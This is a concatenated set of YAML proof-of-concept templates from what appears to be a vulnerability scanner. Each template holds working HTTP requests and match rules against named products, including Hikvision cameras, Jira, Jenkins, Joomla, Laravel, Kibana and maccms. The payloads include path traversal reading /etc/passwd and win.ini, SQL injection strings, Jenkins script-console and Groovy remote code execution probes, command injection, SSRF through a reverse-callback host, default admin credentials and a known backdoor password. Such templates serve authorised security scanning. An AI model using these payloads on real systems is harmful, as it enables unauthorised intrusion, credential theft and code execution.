-------------------------------------------------------------------------------- /src/plugins/pocs/h5s-video-platform-cnvd-2020-67113-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-h5s-video-platform-cnvd-2020-67113-unauth 2 | groups: 3 | h5s1: 4 | - method: GET 5 | path: /api/v1/GetSrc 6 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"H5_AUTO") && response.body.bcontains(b"strUser") && response.body.bcontains(b"strPasswd") 7 | h5s2: 8 | - method: GET 9 | path: /api/v1/GetDevice 10 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"H5_DEV") && response.body.bcontains(b"strUser") && 
response.body.bcontains(b"strPasswd") 11 | expression: h5s1() || h5s2() 12 | detail: 13 | author: iak3ec(https://github.com/nu0l) 14 | payload: /#/Dashboard | /#/Settings/Camera 15 | links: 16 | - https://www.cnvd.org.cn/flaw/show/CNVD-2020-67113 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/hadoop-yarn-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hadoop-yarn-unauth 2 | rules: 3 | - method: GET 4 | path: /ws/v1/cluster/info 5 | follow_redirects: true 6 | headers: 7 | Content-Type: application/json 8 | expression: | 9 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"resourceManagerVersionBuiltOn") && response.body.bcontains(b"hadoopVersion") 10 | detail: 11 | author: p0wd3r,sharecast 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/hanming-video-conferencing-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hanming-video-conferencing-file-read 2 | groups: 3 | windows: 4 | - method: GET 5 | path: /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) 9 | 10 | linux: 11 | - method: GET 12 | path: /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd 13 | follow_redirects: false 14 | expression: | 15 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 16 | 17 | detail: 18 | author: kzaopa(https://github.com/kzaopa) 19 | links: 20 | - https://mp.weixin.qq.com/s/F-M21PT0xn9QOuwoC8llKA 
-------------------------------------------------------------------------------- /src/plugins/pocs/hikvision-cve-2017-7921.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hikvision-cve-2017-7921 2 | rules: 3 | - method: GET 4 | path: /system/deviceInfo?auth=YWRtaW46MTEK 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.headers["content-type"] == "application/xml" && response.body.bcontains(b"") 8 | detail: 9 | author: whwlsfb(https://github.com/whwlsfb) 10 | links: 11 | - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/hikvision-gateway-data-file-read.yml: -------------------------------------------------------------------------------- 1 | name: hikvision-gateway-data-file-read 2 | rules: 3 | - method: GET 4 | path: /data/login.php::$DATA 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b'DataBaseQuery();') && response.body.bcontains(b'$_POST[\'userName\'];') && response.body.bcontains(b'$_POST[\'password\'];') 7 | info: 8 | author: zan8in 9 | description: | 10 | HIKVISION 视频编码设备接入网关 $DATA 任意文件读取 11 | HIKVISION 视频编码设备接入网关存在配置错误特性,特殊后缀请求php文件可读取源码 12 | title="视频编码设备接入网关" 13 | links: 14 | - http://wiki.peiqi.tech/wiki/iot/HIKVISION/HIKVISION%20%E8%A7%86%E9%A2%91%E7%BC%96%E7%A0%81%E8%AE%BE%E5%A4%87%E6%8E%A5%E5%85%A5%E7%BD%91%E5%85%B3%20$DATA%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.html 15 | 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/hikvision-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hikvision-info-leak 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"流媒体管理服务器") && 
response.body.bcontains(b"海康威视") 8 | - method: GET 9 | path: /config/user.xml 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"- 5 | /index.htm?PAGE=web 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(b"www.ifw8.cn") 9 | - method: GET 10 | path: >- 11 | /action/usermanager.htm 12 | follow_redirects: false 13 | expression: > 14 | response.status == 200 && "\"pwd\":\"[0-9a-z]{32}\"".bmatches(response.body) 15 | detail: 16 | author: cc_ci(https://github.com/cc8ci) 17 | Affected Version: "v4.31" 18 | links: 19 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16313 20 | - http://www.iwantacve.cn/index.php/archives/311/ 21 | - https://nvd.nist.gov/vuln/detail/CVE-2019-16312 -------------------------------------------------------------------------------- /src/plugins/pocs/iis-put-getshell.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-iis-put-getshell 2 | set: 3 | filename: randomLowercase(6) 4 | fileContent: randomLowercase(6) 5 | 6 | rules: 7 | - method: PUT 8 | path: /{(unknown)}.txt 9 | body: | 10 | {{fileContent}} 11 | expression: | 12 | response.status == 201 13 | - method: GET 14 | path: /{(unknown)}.txt 15 | follow_redirects: false 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(fileContent)) 18 | 19 | detail: 20 | author: Cannae(github.com/thunderbarca) 21 | links: 22 | - https://www.cnblogs.com/-mo-/p/11295400.html 23 | -------------------------------------------------------------------------------- /src/plugins/pocs/influxdb-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-influxdb-unauth 2 | rules: 3 | - method: GET 4 | path: /ping 5 | follow_redirects: true 6 | expression: | 7 | response.status == 204 && "x-influxdb-version" in response.headers 8 | - method: GET 9 | path: 
/query?q=show%20users 10 | follow_redirects: true 11 | expression: > 12 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"columns") && response.body.bcontains(b"user") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://docs.influxdata.com/influxdb/v1.7/tools/api/ -------------------------------------------------------------------------------- /src/plugins/pocs/inspur-tscev4-cve-2020-21224-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-inspur-tscev4-cve-2020-21224-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /login 8 | body: op=login&username=1 2\',\'1\'\);`expr%20{{r1}}%20%2b%20{{r2}}` 9 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string(r1 + r2))) 10 | detail: 11 | author: jingling(https://github.com/shmilylty) 12 | links: 13 | - https://github.com/NS-Sp4ce/Inspur 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/jboss-cve-2010-1871.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jboss-cve-2010-1871 2 | set: 3 | r1: randomInt(8000000, 10000000) 4 | r2: randomInt(8000000, 10000000) 5 | rules: 6 | - method: GET 7 | path: /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{r1}}*{{r2}}%7d 8 | follow_redirects: false 9 | expression: | 10 | response.status == 302 && response.headers["location"].contains(string(r1 * r2)) 11 | detail: 12 | author: fuping 13 | links: 14 | - http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871 -------------------------------------------------------------------------------- /src/plugins/pocs/jboss-unauth.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-jboss-unauth 2 | rules: 3 | - method: GET 4 | path: /jmx-console/ 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web") 8 | detail: 9 | author: FiveAourThe(https://github.com/FiveAourThe) 10 | links: 11 | - https://xz.aliyun.com/t/6103 -------------------------------------------------------------------------------- /src/plugins/pocs/jeewms-showordownbyurl-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jeewms-showordownbyurl-fileread 2 | groups: 3 | linux: 4 | - method: GET 5 | path: /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | windows: 9 | - method: GET 10 | path: /systemController/showOrDownByurl.do?down=&dbPath=../../../../../Windows/win.ini 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"for 16-bit app support") 13 | detail: 14 | author: B1anda0(https://github.com/B1anda0) 15 | links: 16 | - https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/jellyfin-file-read-cve-2021-21402.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jellyfin-file-read-cve-2021-21402 2 | rules: 3 | - method: GET 4 | path: "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"for 16-bit app support") 7 | detail: 8 | author: Print1n(https://github.com/Print1n) 9 | links: 10 | - https://blog.csdn.net/qq_41503511/article/details/116274406 11 | 
-------------------------------------------------------------------------------- /src/plugins/pocs/jenkins-cve-2018-1000600.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-cve-2018-1000600 2 | set: 3 | reverse: newReverse() 4 | reverseUrl: reverse.url 5 | rules: 6 | - method: GET 7 | path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}} 8 | expression: | 9 | response.status == 200 && reverse.wait(5) 10 | detail: 11 | author: PickledFish(https://github.com/PickledFish) 12 | links: 13 | - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/jenkins-cve-2018-1000861-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-cve-2018-1000861-rce 2 | set: 3 | rand: randomLowercase(4) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27{{rand}}%27,%20version=%271%27)%0aimport%20Payload; 8 | follow_redirects: false 9 | expression: >- 10 | response.status == 200 && response.body.bcontains(bytes("package#" + rand)) 11 | detail: 12 | author: p0wd3r 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/jenkins-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-unauthorized-access 2 | set: 3 | r1: randomInt(1000, 9999) 4 | r2: randomInt(1000, 9999) 5 | rules: 6 
| - method: GET 7 | path: /script 8 | follow_redirects: false 9 | expression: response.status == 200 10 | search: | 11 | "Jenkins-Crumb", "(?P.+?)"\); 12 | - method: POST 13 | path: /script 14 | body: | 15 | script=printf%28%27{{r1}}%25%25{{r2}}%27%29%3B&Jenkins-Crumb={{var}}&Submit=%E8%BF%90%E8%A1%8C 16 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1) + "%" + string(r2))) 17 | detail: 18 | author: MrP01ntSun(https://github.com/MrPointSun) 19 | links: 20 | - https://www.cnblogs.com/yuzly/p/11255609.html 21 | - https://blog.51cto.com/13770310/2156663 22 | -------------------------------------------------------------------------------- /src/plugins/pocs/jetty-cve-2021-28164.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jetty-cve-2021-28164 2 | rules: 3 | - method: GET 4 | path: /%2e/WEB-INF/web.xml 5 | follow_redirects: false 6 | expression: 7 | response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(b"") 8 | detail: 9 | author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x) 10 | links: 11 | - https://www.linuxlz.com/aqld/2309.html 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/jira-cve-2019-8442.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2019-8442 2 | rules: 3 | - method: GET 4 | path: "/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes(string(b"com.atlassian.jira"))) && response.content_type.contains("application/xml") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | Affected Version: "<7.13.4, 8.00-8.0.4, 8.1.0-8.1.1" 10 | links: 11 | - https://nvd.nist.gov/vuln/detail/CVE-2019-8442 12 | -------------------------------------------------------------------------------- 
/src/plugins/pocs/jira-cve-2019-8449.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2019-8449 2 | rules: 3 | - method: GET 4 | path: /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false 5 | expression: | 6 | response.status == 200 && response.content_type.icontains("json") && response.headers["X-AREQUESTID"] != "" && response.body.bcontains(b"total") && response.body.bcontains(b"groups") && response.body.bcontains(b"header") && response.body.bcontains(b"users") 7 | detail: 8 | author: MaxSecurity(https://github.com/MaxSecurity) 9 | links: 10 | - https://xz.aliyun.com/t/7219 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/jira-cve-2020-14179.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2020-14179 2 | rules: 3 | - method: GET 4 | path: /secure/QueryComponent!Default.jspa 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"com.atlassian.jira") 8 | detail: 9 | author: harris2015(https://github.com/harris2015) 10 | links: 11 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/jira-cve-2020-14181.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2020-14181 2 | set: 3 | r: randomLowercase(8) 4 | rules: 5 | - method: GET 6 | path: /secure/ViewUserHover.jspa?username={{r}} 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes("/secure/ViewProfile.jspa?name=" + r)) && response.body.bcontains(bytes("com.atlassian.jira")) 10 | detail: 11 | author: whwlsfb(https://github.com/whwlsfb) 12 | links: 13 | - 
https://www.tenable.com/cve/CVE-2020-14181 14 | - https://twitter.com/ptswarm/status/1318914772918767619 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/jira-ssrf-cve-2019-8451.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-ssrf-cve-2019-8451 2 | set: 3 | reverse: newReverse() 4 | originScheme: request.url.scheme 5 | originHost: request.url.host 6 | reverseURL: reverse.domain 7 | rules: 8 | - method: GET 9 | path: >- 10 | /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseURL}} 11 | headers: 12 | X-Atlassian-Token: no-check 13 | expression: | 14 | reverse.wait(5) 15 | detail: 16 | author: jingling(https://github.com/shmilylty) 17 | links: 18 | - https://jira.atlassian.com/browse/JRASERVER-69793 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/joomla-component-vreview-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-component-vreview-sql 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: POST 6 | path: /index.php?option=com_vreview&task=displayReply 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: >- 10 | profileid=-8511 OR 1 GROUP BY CONCAT(0x7e,md5({{r1}}),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)# 11 | follow_redirects: true 12 | expression: | 13 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 14 | detail: 15 | author: 南方有梦(https://github.com/hackgov) 16 | Affected Version: "1.9.11" 17 | links: 18 | - https://www.exploit-db.com/exploits/46227 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/joomla-cve-2015-7297-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2015-7297-sqli 2 | rules: 3 | - method: GET 4 | 
path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) 5 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 6 | detail: 7 | links: 8 | - https://www.exploit-db.com/exploits/38797 9 | - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html 10 | - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ -------------------------------------------------------------------------------- /src/plugins/pocs/joomla-cve-2017-8917-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2017-8917-sqli 2 | rules: 3 | - method: GET 4 | path: "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)" 5 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 6 | detail: 7 | links: 8 | - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917 -------------------------------------------------------------------------------- /src/plugins/pocs/joomla-cve-2018-7314-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2018-7314-sql 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{r1}})))-- X 7 | expression: | 8 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 9 | detail: 10 | author: 南方有梦(http://github.com/hackgov) 11 | Affected Version: "3.0.2" 12 | links: 13 | - https://www.exploit-db.com/exploits/44160 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/jupyter-notebook-unauthorized-access.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-jupyter-notebook-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: "/terminals/3" 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"terminals/websocket") && !response.body.bcontains(b"Password:") 8 | detail: 9 | author: bufsnake(https://github.com/bufsnake) 10 | links: 11 | - https://vulhub.org/#/environments/jupyter/notebook-rce/ 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/kafka-manager-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kafka-manager-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Add Cluster") 8 | detail: 9 | author: Aquilao(https://github.com/Aquilao) 10 | links: 11 | - https://blog.csdn.net/qq_36923426/article/details/111361158 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/kibana-cve-2018-17246.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kibana-cve-2018-17246 2 | rules: 3 | - method: GET 4 | path: /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.headers["kbn-name"] == "kibana" && response.content_type.contains("application/json") && response.body.bcontains(bytes("\"statusCode\":500")) && response.body.bcontains(bytes("\"message\":\"An internal server error occurred\"")) 8 | detail: 9 | author: canc3s(https://github.com/canc3s) 10 | kibana_version: before 6.4.3 and 5.6.13 11 | links: 12 | - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 13 | - 
https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/kibana-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kibana-unauth 2 | rules: 3 | - method: GET 4 | path: /app/kibana 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b".kibanaWelcomeView") 8 | detail: 9 | author: Isaac(https://github.com/IsaacQiang) 10 | links: 11 | - https://zhuanlan.zhihu.com/p/61215662 -------------------------------------------------------------------------------- /src/plugins/pocs/kingsoft-v8-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kingsoft-v8-default-password 2 | rules: 3 | - method: POST 4 | path: /inter/ajax.php?cmd=get_user_login_cmd 5 | body: "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}" 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession") 9 | detail: 10 | author: B1anda0(https://github.com/B1anda0) 11 | links: 12 | - https://idc.wanyunshuju.com/aqld/2123.html -------------------------------------------------------------------------------- /src/plugins/pocs/kingsoft-v8-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kingsoft-v8-file-read 2 | rules: 3 | - method: GET 4 | path: >- 5 | /htmltopdf/downfile.php?filename=/windows/win.ini 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) && response.headers["Content-Type"].contains("application/zip") 9 | 10 | detail: 11 | author: kzaopa(https://github.com/kzaopa) 12 | links: 13 | - 
https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/kong-cve-2020-11710-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kong-cve-2020-11710-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"kong_env") 7 | - method: GET 8 | path: /status 9 | expression: | 10 | response.status == 200 && response.body.bcontains(b"kong_db_cache_miss") 11 | detail: 12 | author: Loneyer 13 | links: 14 | - https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/kubernetes-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kubernetes-unauth 2 | rules: 3 | - method: GET 4 | path: /api/v1/nodes 5 | expression: | 6 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"\"kubeletVersion\": \"v") && response.body.bcontains(b"\"containerRuntimeVersion\"") 7 | detail: 8 | author: mumu0215(https://github.com/mumu0215) 9 | links: 10 | - http://luckyzmj.cn/posts/15dff4d3.html 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/kyan-network-monitoring-account-password-leakage.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kyan-network-monitoring-account-password-leakage 2 | rules: 3 | - method: GET 4 | path: /hosts 5 | expression: "true" 6 | search: Password=(?P.+) 7 | - method: POST 
8 | path: /login.php 9 | body: user=admin&passwd={{pass}} 10 | follow_redirects: true 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"设备管理系统") && response.body.bcontains(b"context.php") && response.body.bcontains(b"left.php") 13 | detail: 14 | author: B1anda0(https://github.com/B1anda0) 15 | links: 16 | - https://mp.weixin.qq.com/s/6phWjDrGG0pCpGuCdLusIg 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/landray-oa-custom-jsp-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-landray-oa-custom-jsp-fileread 2 | groups: 3 | linux: 4 | - method: POST 5 | path: /sys/ui/extend/varkind/custom.jsp 6 | body: var={"body":{"file":"file:///etc/passwd"}} 7 | expression: | 8 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 9 | windows: 10 | - method: POST 11 | path: /sys/ui/extend/varkind/custom.jsp 12 | body: var={"body":{"file":"file:///c://windows/win.ini"}} 13 | expression: | 14 | response.status == 200 && response.body.bcontains(b"for 16-bit app support") 15 | detail: 16 | author: B1anda0(https://github.com/B1anda0) 17 | links: 18 | - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/lanproxy-cve-2021-3019-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-lanproxy-cve-2021-3019-lfi 2 | rules: 3 | - method: GET 4 | path: "/../conf/config.properties" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | Affected Version: "lanproxy 0.1" 10 | links: 11 | - https://github.com/ffay/lanproxy/issues/152 12 | - 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/laravel-cve-2021-3129.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-laravel-cve-2021-3129 2 | set: 3 | r: randomLowercase(12) 4 | rules: 5 | - method: POST 6 | path: /_ignition/execute-solution 7 | headers: 8 | Content-Type: application/json 9 | body: |- 10 | { 11 | "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", 12 | "parameters": { 13 | "variableName": "username", 14 | "viewFile": "{{r}}" 15 | } 16 | } 17 | follow_redirects: true 18 | expression: > 19 | response.status == 500 && response.body.bcontains(bytes("file_get_contents(" + string(r) + ")")) && response.body.bcontains(bytes("failed to open stream")) 20 | detail: 21 | author: Jarcis-cy(https://github.com/Jarcis-cy) 22 | links: 23 | - https://github.com/vulhub/vulhub/blob/master/laravel/CVE-2021-3129 24 | -------------------------------------------------------------------------------- /src/plugins/pocs/laravel-debug-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-laravel-debug-info-leak 2 | rules: 3 | - method: POST 4 | path: / 5 | follow_redirects: false 6 | expression: > 7 | response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment & details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php")) 8 | detail: 9 | author: Dem0ns (https://github.com/dem0ns) 10 | links: 11 | - https://github.com/dem0ns/improper/tree/master/laravel/5_debug 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/laravel-improper-webdir.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-laravel-improper-webdir 2 | rules: 3 | - method: GET 4 | path: /storage/logs/laravel.log 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace")) 8 | detail: 9 | author: Dem0ns (https://github.com/dem0ns) 10 | links: 11 | - https://github.com/dem0ns/improper 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/maccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-maccms-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?m=vod-search&wd={if-A:printf(md5({{r}}))}{endif-A} 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes(md5(string(r)))) 10 | detail: 11 | Affected Version: "maccms8.x" 12 | author: hanxiansheng26(https://github.com/hanxiansheng26) 13 | links: 14 | - https://www.cnblogs.com/test404/p/7397755.html -------------------------------------------------------------------------------- /src/plugins/pocs/maccmsv10-backdoor.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-maccmsv10-backdoor 2 | rules: 3 | - method: POST 4 | path: /extend/Qcloud/Sms/Sms.php 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: getpwd=WorldFilledWithLove 8 | follow_redirects: false 9 | expression: > 10 | response.status == 200 && response.body.bcontains(b"扫描后门") && response.body.bcontains(b"反弹端口") && response.body.bcontains(b"文件管理") 11 | detail: 12 | author: FiveAourThe(https://github.com/FiveAourThe) 13 | 
